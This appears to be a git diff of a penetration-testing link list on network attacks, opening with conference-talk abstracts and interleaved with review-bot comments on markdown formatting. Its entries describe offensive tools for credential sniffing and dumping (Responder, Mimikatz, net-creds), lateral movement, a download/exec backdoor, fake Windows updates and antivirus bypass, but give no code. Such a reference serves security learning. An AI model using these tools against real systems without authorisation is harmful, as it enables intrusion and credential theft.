State of the Software Supply Chain reports from 2015 through 2017. The reports blend of public and proprietary data with expert research and analysis. Attendees in this session will learn: - What our analysis of 25,000 applications reveals about the quality and security of software built with open source components - How organizations like Mayo Clinic, Exxon, Capital One, the U.S. 
FDA and Intuit are utilizing the principles of software supply chain automation to improve application security - Why avoiding open source components over 3 years old might be a really good idea - How to balance the need for speed with quality and security -- early in the development lifecycle We will also discuss how you can best approach the effort for development teams to identify, track and replace components with known vulnerabilities, while getting more products and new features to market quickly. Attend this session and gain insight as to how your organization’s application development practices compare to others. I'll share the industry benchmarks to take back and discuss with your development, security, and open source governance teams.
[303 Hacks Lies Nation States Mario DiNatale](https://www.youtube.com/watch?v=nyh_ORq1Qwk)
[Paul Rascagneres - Modern Reconnaissance Phase by APT – Protection Layer](https://www.youtube.com/watch?v=4JVrK7bRKb0&index=10&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
[BE YOUR OWN VPN PROVIDER WITH OPENBSD (v2)](https://networkfilter.blogspot.com/2017/04/be-your-own-vpn-provider-with-openbsd-v2.html)
[New cache architecture on Intel I9 and Skylake server: An initial assessment](https://cyber.wtf/2017/07/18/new-cache-architecture-on-intel-i9-and-skylake-server-an-initial-assessment/)
[301 The Road to Hiring is Paved in Good Intentions Tim OBrien](https://www.youtube.com/watch?v=sdkf8SIj1rU)
[Ermahgerd: Lawrs - Robert Heverly - Anycon17](http://www.irongeek.com/i.php?page=videos/anycon2017/305-ermahgerd-lawrs-prof-robert-heverly)
* When do you ? and other coders, hackers, developers, and tinkerers ? think or worry about the law? If your answer is, ?Not very often,? then this talk is for you. We all need to think about the law. And it?s not just privacy, or computer fraud, or even anti-circumvention law, that we should think about. We need to think about law as a whole and how it can help us do or stop us from doing what we want to do. This talk will start with a broad overview of the ways in which we implicate law when we do what we do, and then will focus on what that means for us and the broader implications that can arise from our various activities. Do you think the law would stop you from doing what you want to do or punish you for doing it? It might, but it also might not. If you think it does, do you think you should be able to do what you want to do? If you do, then we need to hack the law, and to do that we?ll need to talk to the legal coders, those writers of our cultural software. This talk will tackle not only law and working with code, but also why it matters for us to be aware of the law and engaged in improving it.
[Richard Thieme - The Impact of Dark Knowledge and Secrets on Security and Intelligence Professionals](https://www.youtube.com/watch?v=0MzcPBAj88A&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe)
* Dismissing or laughing off concerns about what it does to a person to know critical secrets does not lessen the impact on life, work, and relationships of building a different map of reality than “normal people” use. One has to calibrate narratives to what another believes. One has to live defensively, warily. This causes at the least cognitive dissonance which some manage by denial. But refusing to feel the pain does not make it go away. It just intensifies the consequences when they erupt.
Philip K. Dick said, reality is that which, when you no longer believe in it, does not go away. When cognitive dissonance evolves into symptoms of traumatic stress, one ignores those symptoms at one’s peril. But the very constraints of one’s work often make it impossible to speak aloud about those symptoms, because that might threaten one’s clearances, work, and career. And whistle blower protection is often non-existent.
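Review bot: the Heverly (Anycon17) abstract has lost its apostrophes and dashes to literal question marks ("When do you ? and other coders", "it?s not just privacy", "?Not very often,?", "we?ll need to talk"); re-paste it from the source page so it renders cleanly. Two smaller copy problems in the same region: the software-supply-chain abstract is split across two lines mid-sentence ("Capital One, the U.S." / "FDA and Intuit"), so the second half renders as a separate paragraph, and its opening sentence reads "across 3,000 organizations and 25,000." with the noun dropped after 25,000 (the later sentence says "25,000 applications").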


Draft/Exploit Development/Lab for Practicing Exploit Writing.txt → Draft/Lab for Practicing Exploit Writing.txt


+ 175
- 142
Draft/Network Attacks & Defenses.md

@ -24,25 +24,17 @@ TOC
##### To be sorted
http://www.pentest-standard.org/index.php/Intelligence_Gathering
[PiTap](https://github.com/williamknows/PiTap)
* Automatic bridge creation and packet capture (plug-and-capture) on a battery-powered Raspberry Pi with multiple network interfaces.
* [Blogpost]()
[RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](https://tools.ietf.org/html/rfc2827)
[bluebox-ng](https://github.com/jesusprubio/bluebox-ng)
* Pentesting framework using Node.js powers, focused in VoIP.
[SIMPLYEMAIL](https://github.com/killswitch-GUI/SimplyEmail)
* What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.
[Scanning Effectively Through a SOCKS Pivot with Nmap and Proxychains](https://cybersyndicates.com/2015/12/nmap-and-proxychains-scanning-through-a-socks-piviot/)
* [Script](https://github.com/killswitch-GUI/PenTesting-Scripts/blob/master/Proxychains-Nmap.py)
##### sort end
###### To Do
* Sort Scanners into sections
* Active Directory Section?
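Review bot: the PiTap entry carries an empty link, `* [Blogpost]()`, which renders as a dead link; either fill in the URL or drop the bullet until there is one. In the same block, `http://www.pentest-standard.org/index.php/Intelligence_Gathering` is a bare URL while every other entry is a `[title](url)` link, and SimplyEmail is listed here although this commit also adds it under the new `#### Email` subsection further down, so the "To be sorted" copy should go once the move is confirmed.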
@ -80,7 +72,7 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
[STP MiTM Attack and L2 Mitigation Techniques on the Cisco Catalyst 6500 ](http://www.ndm.net/ips/pdf/cisco/Catalyst-6500/white_paper_c11_605972.pdf)
[RFC 2827 - Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing](https://tools.ietf.org/html/rfc2827)
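Review bot: the RFC 2827 link at the end of this hunk duplicates the copy still sitting in the "To be sorted" block near the top of the file; keep one (this placement next to the STP/L2 mitigation paper is the better home) and remove the other so the rendered page does not list the RFC twice.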
@ -89,17 +81,19 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
### <a name="attackw">Attacking Windows Networks</a>
[ *Puff* *Puff* PSExec - Lateral Movement: An Overview](https://www.toshellandback.com/2017/02/11/psexec/)
[Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight](http://www.irongeek.com/i.php?page=videos/derbycon6/119-introducing-powershell-into-your-arsenal-with-psattack-jared-haight)
[Ditch PsExec, SprayWMI is here ;)](http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/)
[Windows Attacks AT is the new black](https://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607)
#### Movement
[*Puff* *Puff* PSExec - Lateral Movement: An Overview](https://www.toshellandback.com/2017/02/11/psexec/)
[Ditch PsExec, SprayWMI is here ;)](http://www.pentest.guru/index.php/2015/10/19/ditch-psexec-spraywmi-is-here/)
[WMIOps](https://github.com/ChrisTruncer/WMIOps)
* WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. It's designed primarily for use on penetration tests or red team engagements.
[Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/)
[spraywmi](https://github.com/trustedsec/spraywmi)
* SprayWMI is a method for mass spraying Unicorn PowerShell injection to CIDR notations.
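Review bot: "*Puff* *Puff* PSExec" and "Ditch PsExec, SprayWMI is here" each appear twice in this hunk, once directly under `### Attacking Windows Networks` and again under the new `#### Movement` subheading. If the intent is to move them, the first copies must be removed rather than left as context, otherwise the rendered file lists each twice; the same applies to "Windows Attacks AT is the new black" and the Mimikatz pt. 2 post, which reappear under `#### Active Directory` in the next hunk. The PSExec title also differs between the two copies (`[ *Puff*` with a leading space versus `[*Puff*`), which is worth normalising while deduplicating.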
@ -107,131 +101,88 @@ http://www.pentest-standard.org/index.php/Intelligence_Gathering
* A rapid psexec style attack with samba tools
* [Blogpost that inspired it](http://carnal0wnage.attackresearch.com/2012/01/psexec-fail-upload-and-exec-instead.html)
[Sparty - MS Sharepoint and Frontpage Auditing Tool](http://sparty.secniche.org/)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[sshuttle](https://github.com/apenwarr/sshuttle)
* Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
[Responder](https://github.com/SpiderLabs/Responder/)
* Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
[SPScan]http://sourceforge.net/projects/spscan/)
* SPScan is a tool written in Ruby that enumerates a SharePoint installation gathering information about the version and installed plugins.
#### Active Directory
[SPartan](https://github.com/sensepost/SPartan)
* SPartan is a Frontpage and Sharepoint fingerprinting and attack tool
[Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2](http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/)
[MS Network Level Authentication](https://technet.microsoft.com/en-us/magazine/hh750380.aspx)
[Windows Attacks AT is the new black](https://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607)
[Dragon: A Windows, non-binding, passive download / exec backdoor](http://www.shellntel.com/blog/2015/6/11/dragon-a-windows-non-binding-passive-downloadexec-backdoor)
[Attacking ADFS Endpoints with PowerShell](http://www.irongeek.com/i.php?page=videos/derbycon6/118-attacking-adfs-endpoints-with-powershell-karl-fosaaen)
[ms15-034.nse Script](https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse)
[PowerShell-AD-Recon](https://github.com/PyroTek3/PowerShell-AD-Recon)
* AD PowerShell Recon Scripts
[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
* Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
* [Presentation](https://www.youtube.com/watch?v=P1lkflnWb0I)
[Netview](https://github.com/mubix/netview)
* Netview is a enumeration tool. It uses (with the -d) the current domain or a specified domain (with the -d domain) to enumerate hosts
[How to Bypass Anti-Virus to Run Mimikatz](http://www.blackhillsinfosec.com/?p=5555)
[LLMNR and NBT-NS Poisoning Using Responder](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)
[Attacking ADFS Endpoints with PowerShell](http://www.irongeek.com/i.php?page=videos/derbycon6/118-attacking-adfs-endpoints-with-powershell-karl-fosaaen)
[Introducing PowerShell into your Arsenal with PS>Attack - Jared Haight](http://www.irongeek.com/i.php?page=videos/derbycon6/119-introducing-powershell-into-your-arsenal-with-psattack-jared-haight)
### <a name="tools">Tools</a>
#### Sharepoint
[Sparty - MS Sharepoint and Frontpage Auditing Tool](http://sparty.secniche.org/)
* Sparty is an open source tool written in python to audit web applications using sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.
[digbit](https://github.com/mnmnc/digbit/blob/master/README.md)
* Automatic domain generation for BitSquatting
[SPScan](http://sourceforge.net/projects/spscan/)
* SPScan is a tool written in Ruby that enumerates a SharePoint installation gathering information about the version and installed plugins.
[discover - Kali Scripts](https://github.com/leebaird/discover)
* For use with Kali Linux - custom bash scripts used to automate various portions of a pentest.
[SPartan](https://github.com/sensepost/SPartan)
* SPartan is a Frontpage and Sharepoint fingerprinting and attack tool
[w3af](https://github.com/andresriancho/w3af)
* w3af: web application attack and audit framework, the open source web vulnerability scanner.
#### Network based
[Yersinia](http://www.yersinia.net/)
* Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
[CiscoRouter - tool](https://github.com/ajohnston9/ciscorouter)
* CiscoRouter is a tool for scanning Cisco-based routers over SSH. Rules can be created using accompanying CiscoRule application (see this repo) and stored in the "rules" directory.
[Responder](https://github.com/SpiderLabs/Responder/)
* Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
[MS Network Level Authentication](https://technet.microsoft.com/en-us/magazine/hh750380.aspx)
[PowerShell-AD-Recon](https://github.com/PyroTek3/PowerShell-AD-Recon)
* AD PowerShell Recon Scripts
[Enum4Linux](https://labs.portcullis.co.uk/tools/enum4linux/)
* Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.
[NbtScan](http://www.unixwiz.net/tools/nbtscan.html)
* This is a command-line tool that scans for open NETBIOS nameservers on a local or remote TCP/IP network, and this is a first step in finding of open shares. It is based on the functionality of the standard Windows tool nbtstat, but it operates on a range of addresses instead of just one. I wrote this tool because the existing tools either didn't do what I wanted or ran only on the Windows platforms: mine runs on just about everything.
[netcat](http://nc110.sourceforge.net/)
* Network Swiss army knife. Ncat’s predecessor. Does everything and the kitchen sink.
[Ncat](http://nmap.org/)
* Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
[DNSEnum](https://github.com/fwaeytens/dnsenum)
* Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.
[Enum4Linux](https://labs.portcullis.co.uk/tools/enum4linux/)
* Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe formerly available from www.bindview.com. It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.
### <a name="tools">Tools</a>
[TXTDNS](http://www.txdns.net/)
* TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: Typos: Mised, doouble and transposde keystrokes; TLD/ccSLD rotation; Dictionary attack; Full Brute-force attack using alpha, numeric or alphanumeric charsets; Reverse grinding.
[JXplorer](http://jxplorer.org/)
* JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. It is highly flexible and can be extended and customised in a number of ways. JXplorer is written in java, and the source code and Ant build system are available via svn or as a packaged build for users who want to experiment or further develop the program.
[LDAPMfINER](http://ldapminer.sourceforge.net/)
* This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C
[digbit](https://github.com/mnmnc/digbit/blob/master/README.md)
* Automatic domain generation for BitSquatting
[Yersinia](http://www.yersinia.net/)
* Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
[Firewalk](http://packetfactory.openwall.net/projects/firewalk/)
* Firewalk is an active reconnaissance network security tool that attempts to determine what layer 4 protocols a given IP forwarding device will pass. Firewalk works by sending out TCP or UDP packets with a TTL one greater than the targeted gateway. If the gateway allows the traffic, it will forward the packets to the next hop where they will expire and elicit an ICMP_TIME_EXCEEDED message. If the gateway hostdoes not allow the traffic, it will likely drop the packets on the floor and we will see no response. To get the correct IP TTL that will result in expired packets one beyond the gateway we need to ramp up hop-counts. We do this in the same manner that traceroute works. Once we have the gateway hopcount (at that point the scan is said to be `bound`) we can begin our scan.
[netcat](http://nc110.sourceforge.net/)
* Network Swiss army knife. Ncat’s predecessor. Does everything and the kitchen sink.
[Softera LDAP Browser](http://www.ldapbrowser.com/info_softerra-ldap-browser.htm)
* LDAP Browser that supports most LDAP implementations. Non-free software, 30-day free trial
[Tinfoleak](http://vicenteaguileradiaz.com/tools/)
* tinfoleak is a simple Python script that allow to obtain:
..* basic information about a Twitter user (name, picture, location, followers, etc.)
..* devices and operating systems used by the Twitter user
..* applications and social networks used by the Twitter user
..* place and geolocation coordinates to generate a tracking map of locations visited
..* show user tweets in Google Earth!
..* download all pics from a Twitter user
..* hashtags used by the Twitter user and when are used (date and time)
..* user mentions by the the Twitter user and when are occurred (date and time)
..* topics used by the Twitter user
[Ncat](http://nmap.org/)
* Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
[net-creds](https://github.com/DanMcInerney/net-creds)
* Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification
* It sniffs: URLs visited; POST loads sent; HTTP form logins/passwords; HTTP basic auth logins/passwords; HTTP searches; FTP logins/passwords; IRC logins/passwords; POP logins/passwords; IMAP logins/passwords; Telnet logins/passwords; SMTP logins/passwords; SNMP community string; NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc; Kerberos.
[RANCID - Really Awesome New Cisco confIg Differ](http://www.shrubbery.net/rancid/)
* RANCID monitors a router's (or more generally a device's) configuration, including software and hardware (cards, serial numbers, etc) and uses CVS (Concurrent Version System) or Subversion to maintain history of changes.
* RANCID does this by the very simple process summarized as: login to each device in the router table (router.db), run various commands to get the information that will be saved, cook the output; re-format, remove oscillating or incrementing data, email any differences (sample) from the previous collection to a mail list, and finally commit those changes to the revision control system
[Stenographer](https://github.com/google/stenographer/blob/master/README.md)
* Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
[Netview](https://github.com/mubix/netview)
* Netview is a enumeration tool. It uses (with the -d) the current domain or a specified domain (with the -d domain) to enumerate hosts
[DNS Recon](https://github.com/darkoperator/dnsrecon)
#### LDAP
[DNS Dumpster](DNSdumpster.com is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.)
[OnionScan](https://github.com/s-rah/onionscan)
* [What OnionScan Scans for](https://github.com/s-rah/onionscan/blob/master/doc/what-is-scanned-for.md)
[JXplorer](http://jxplorer.org/)
* JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. It is highly flexible and can be extended and customised in a number of ways. JXplorer is written in java, and the source code and Ant build system are available via svn or as a packaged build for users who want to experiment or further develop the program.
[scanless](https://github.com/vesche/scanless)
* Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you'd like to run a port scan on a host and have it not come from your IP address.
[LDAPMfINER](http://ldapminer.sourceforge.net/)
* This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C
[dvcs-ripper](https://github.com/kost/dvcs-ripper)
* Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even
when directory browsing is turned off.
[Softera LDAP Browser](http://www.ldapbrowser.com/info_softerra-ldap-browser.htm)
* LDAP Browser that supports most LDAP implementations. Non-free software, 30-day free trial
[sshuttle](https://github.com/apenwarr/sshuttle)
* Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
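Review bot: several entries in this hunk will not render as links. `[SPScan]http://sourceforge.net/projects/spscan/)` is missing the opening parenthesis (the later copy under `#### Sharepoint` has it right, so drop the broken one); the DNS Dumpster entry puts the description where the URL belongs, `[DNS Dumpster](DNSdumpster.com is a free domain research tool ...)`, and needs the site address as the target with the description moved to a `*` bullet; and the dvcs-ripper description is broken across two lines ("It can rip repositories even" / "when directory browsing is turned off"), so the second half becomes its own paragraph. `[LDAPMfINER]` is a typo carried into both copies, and its description is cut off mid-sentence ("written in C with the Netscape C"). Structurally, there are two `### <a name="tools">Tools</a>` headings with the same anchor id; if the first is the old one being removed that is fine, otherwise the TOC link only reaches the first. The `#### LDAP` subheading is followed by DNS Dumpster and OnionScan before the actual LDAP tools (JXplorer, LDAPMiner, Softerra), so those two should move to the DNS section this commit adds. Finally, the hunk contains what look like move pairs (Sparty, SPartan, Responder, Enum4Linux, netcat, Ncat, Netview, Yersinia, digbit, discover, sshuttle, scanless, DNS Recon); please confirm each old copy is a removal and not retained context.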
@ -255,7 +206,9 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
[WSUXploit](https://github.com/pimps/wsuxploit)
* This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation, 'WSUSpect – Compromising the Windows Enterprise via Windows Update'
[net-creds](https://github.com/DanMcInerney/net-creds)
* Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification
* It sniffs: URLs visited; POST loads sent; HTTP form logins/passwords; HTTP basic auth logins/passwords; HTTP searches; FTP logins/passwords; IRC logins/passwords; POP logins/passwords; IMAP logins/passwords; Telnet logins/passwords; SMTP logins/passwords; SNMP community string; NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc; Kerberos.
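Review bot: net-creds appears here and also in the large Tools hunk above with an identical two-line description; if this is a move, make sure the earlier copy is removed, otherwise the sniffer is listed twice.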
@ -264,31 +217,69 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
### Scanners
[SQLMap](https://github.com/sqlmapproject/sqlmap)
* sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
[scanless](https://github.com/vesche/scanless)
* Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you'd like to run a port scan on a host and have it not come from your IP address.
[ms15-034.nse Script](https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse)
#### DNS:
[DNSRecon](https://github.com/darkoperator/dnsrecon)
* [Quick Reference Guide](http://pentestlab.wordpress.com/2012/11/13/dns-reconnaissance-dnsrecon/)
[WPScan](https://github.com/wpscanteam/wpscan)
* WPScan is a black box WordPress vulnerability scanner.
[dns-discovery](https://github.com/mafintosh/dns-discovery)
* Discovery peers in a distributed system using regular dns and multicast dns.
[Enumerator](https://pypi.python.org/pypi/enumerator/0.1.4)
* enumerator is a tool built to assist in automating the often tedious task of enumerating a target or list of targets during a penetration test.
[Knockpy](https://github.com/guelfoweb/knock)
* Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled.
[Unicornscan](http://www.unicornscan.org/)
* Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.
[sub6](https://github.com/YasserGersy/sub6)
* subdomain take over detector and crawler
[hostmap](https://github.com/jekil/hostmap)
* hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby by Alessandro Tanasi
[enumall](https://github.com/Dhayalan96/enumall)
* Script to enumerate subdomains, leveraging recon-ng. Uses google scraping, bing scraping, baidu scraping, yahoo scarping, netcraft, and bruteforces to find subdomains. Plus resolves to IP.
[dns-parallel-prober](https://github.com/lorenzog/dns-parallel-prober)
* This script is a proof of concept for a parallelised domain name prober. It creates a queue of threads and tasks each one to probe a sub-domain of the given root domain. At every iteration step each dead thread is removed and the queue is replenished as necessary.
[Altdns](https://github.com/infosec-au/altdns)
* Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.
[AQUATONE](https://github.com/michenriksen/aquatone)
* AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.
[Sublist3r](https://github.com/aboul3la/Sublist3r)
* Fast subdomains enumeration tool for penetration testers
[DNS Recon](https://github.com/darkoperator/dnsrecon)
[DNS Dumpster](DNSdumpster.com is a free domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.)
[TXTDNS](http://www.txdns.net/)
* TXDNS is a Win32 aggressive multithreaded DNS digger. Capable of placing, on the wire, thousands of DNS queries per minute. TXDNS main goal is to expose a domain namespace trough a number of techniques: Typos: Mised, doouble and transposde keystrokes; TLD/ccSLD rotation; Dictionary attack; Full Brute-force attack using alpha, numeric or alphanumeric charsets; Reverse grinding.
[DNSEnum](https://github.com/fwaeytens/dnsenum)
* Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.
#### Email
[SIMPLYEMAIL](https://github.com/killswitch-GUI/SimplyEmail)
* What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.
#### Network Host/Service:
[Nmap](http://nmap.org/)
* Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
[Angry IP Scanner](http://angryip.org/
[Enumerator](https://pypi.python.org/pypi/enumerator/0.1.4)
* enumerator is a tool built to assist in automating the often tedious task of enumerating a target or list of targets during a penetration test.
[hostmap](https://github.com/jekil/hostmap)
* hostmap is a free, automatic, hostnames and virtual hosts discovery tool written in Ruby by Alessandro Tanasi
[Angry IP Scanner](http://angryip.org/)
* Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has many other features.
[UnicornScan](http://www.unicornscan.org/)
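Review bot: the first Angry IP Scanner line, `[Angry IP Scanner](http://angryip.org/`, is missing its closing parenthesis and so does not render; the corrected copy a few lines down is fine, so delete the broken one. Within `#### DNS:`, DNSRecon is listed twice, first as `[DNSRecon]` with the quick-reference guide and later as a bare `[DNS Recon]`; merge into the first. DNS Dumpster still has its description in the URL slot here, the same defect as the old copy. Unicornscan is a port scanner and does not belong under `#### DNS:`; it is already listed under `#### Network Host/Service:`, so drop the DNS copy. The `ms15-034.nse Script` entry under `### Scanners` has no description, unlike every other entry; one line on what the script checks for would match the rest of the list. Minor style: `#### DNS:` and `#### Network Host/Service:` end in a colon while `#### Email` and `#### Sharepoint` do not.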
@ -298,51 +289,78 @@ dsniff is a collection of tools for network auditing and penetration testing. ds
[hping](http://www.hping.org/)
* hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
[Onesixtyone](http://www.phreedom.org/software/onesixtyone/)
* onesixtyone is an SNMP scanner which utilizes a sweep technique to achieve very high performance. It can scan an entire class B network in under 13 minutes. It can be used to discover devices responding to well-known community names or to mount a dictionary attack against one or more SNMP devices.
[WhatWeb](https://github.com/urbanadventurer/WhatWeb)
* WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
[Unicornscan](http://www.unicornscan.org/)
* Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.
[Consul](https://github.com/hashicorp/consul)
* Consul is a tool for service discovery and configuration. Consul is distributed, highly available, and extremely scalable.
[SNMPWALK](http://net-snmp.sourceforge.net/docs/man/snmpwalk.html)
* snmpwalk - retrieve a subtree of management values using SNMP GETNEXT requests
[CloudFail](https://github.com/m0rtem/CloudFail)
* CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server.
[webDisco](https://github.com/joeybelans/webDisco)
* Web discovery tool to capture screenshots from a list of hosts & vhosts. Requests are made via IP address and vhosts to determine differences. Additionallty checks for common administrative interfaces and web server misconfigurations.
[discover - Kali Scripts](https://github.com/leebaird/discover)
* For use with Kali Linux - custom bash scripts used to automate various portions of a pentest.
[Firewalk](http://packetfactory.openwall.net/projects/firewalk/)
